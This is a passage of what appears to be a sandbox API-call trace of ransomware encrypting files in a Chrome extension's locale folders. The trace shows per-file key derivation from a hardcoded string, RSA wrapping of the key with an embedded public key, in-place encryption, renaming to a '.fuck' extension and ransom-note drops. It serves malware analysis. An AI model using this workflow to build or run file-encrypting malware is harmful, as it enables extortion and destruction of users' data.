"c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.416] GetFileType (hFile=0x5d50) returned 0x1 [0253.416] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0253.418] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0253.418] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0253.419] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.419] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.419] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0253.419] GetLastError () returned 0x0 [0253.419] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json")) returned 0x20 [0253.420] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json", dwFileAttributes=0x80) returned 1 [0253.420] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0253.421] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0253.422] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0253.423] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d670) returned 1 [0253.425] CryptCreateHash (in: hProv=0x298d670, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0253.425] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0253.425] CryptHashData (hHash=0x29846a0, pbData=0x28cb3a0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0253.425] CryptDeriveKey (in: hProv=0x298d670, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984fa0) returned 1 [0253.425] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0253.425] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0253.425] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2986dc8) returned 1 [0253.426] CryptImportPublicKeyInfo (in: hCryptProv=0x2986dc8, dwCertEncodingType=0x1, pInfo=0x2995eb0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2995ee0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2995ee8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2985220) returned 1 [0253.426] CryptEncrypt (in: hKey=0x2985220, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0253.426] CryptEncrypt (in: hKey=0x2985220, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2986900*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2986900*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0253.426] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2986900*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2986900*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0253.427] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xbf, lpOverlapped=0x0) returned 1 [0253.428] CryptEncrypt (in: hKey=0x2984fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xbf, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0253.428] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0253.428] CloseHandle (hObject=0x5d60) returned 1 [0253.428] CloseHandle (hObject=0x5d5c) returned 1 [0253.428] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json"), bFailIfExists=0) returned 1 [0253.432] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json", dwFileAttributes=0x0) returned 1 [0253.432] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json.gsg")) returned 1 [0253.434] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json.fuck")) returned 1 [0253.435] CryptDestroyHash (hHash=0x29846a0) returned 1 [0253.435] CryptDestroyKey (hKey=0x2984fa0) returned 1 [0253.435] CryptReleaseContext (hProv=0x298d670, dwFlags=0x0) returned 1 [0253.435] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0253.435] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0253.435] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\readme_back_files.htm")) returned 0xffffffff [0253.435] AreFileApisANSI () returned 1 [0253.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3460, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0253.435] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.436] GetFileType (hFile=0x5d50) returned 0x1 [0253.436] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0253.437] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0253.437] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0253.437] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.437] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.437] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0253.438] GetLastError () returned 0x0 [0253.438] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json")) returned 0x20 [0253.438] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json", dwFileAttributes=0x80) returned 1 [0253.438] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0253.439] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0253.440] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0253.440] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d670) returned 1 [0253.442] CryptCreateHash (in: hProv=0x298d670, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0253.442] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0253.442] CryptHashData (hHash=0x29846a0, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0253.442] CryptDeriveKey (in: hProv=0x298d670, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984fa0) returned 1 [0253.442] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0253.442] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0253.442] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2986658) returned 1 [0253.443] CryptImportPublicKeyInfo (in: hCryptProv=0x2986658, dwCertEncodingType=0x1, pInfo=0x29954f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2995520*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2995528*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2985420) returned 1 [0253.443] CryptEncrypt (in: hKey=0x2985420, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0253.443] CryptEncrypt (in: hKey=0x2985420, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2986e50*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2986e50*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0253.443] WriteFile (in: hFile=0x5d60, lpBuffer=0x2986e50*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2986e50*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0253.444] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xd1, lpOverlapped=0x0) returned 1 [0253.445] CryptEncrypt (in: hKey=0x2984fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd1, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0253.445] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0253.445] CloseHandle (hObject=0x5d5c) returned 1 [0253.445] CloseHandle (hObject=0x5d60) returned 1 [0253.445] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json"), bFailIfExists=0) returned 1 [0253.449] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json", dwFileAttributes=0x0) returned 1 [0253.450] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json.gsg")) returned 1 [0253.451] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json.fuck")) returned 1 [0253.467] CryptDestroyHash (hHash=0x29846a0) returned 1 [0253.467] CryptDestroyKey (hKey=0x2984fa0) returned 1 [0253.467] CryptReleaseContext (hProv=0x298d670, dwFlags=0x0) returned 1 [0253.467] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0253.467] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0253.467] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\readme_back_files.htm")) returned 0xffffffff [0253.467] AreFileApisANSI () returned 1 [0253.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0253.467] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.468] GetFileType (hFile=0x5d50) returned 0x1 [0253.468] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0253.469] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0253.470] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0253.470] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.470] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.470] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0253.470] GetLastError () returned 0x0 [0253.470] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_br\\messages.json")) returned 0x20 [0253.471] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json", dwFileAttributes=0x80) returned 1 [0253.472] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0253.472] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_br\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0253.474] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0253.474] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d670) returned 1 [0253.477] CryptCreateHash (in: hProv=0x298d670, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0253.477] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0253.477] CryptHashData (hHash=0x29846a0, pbData=0x28cb620, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0253.477] 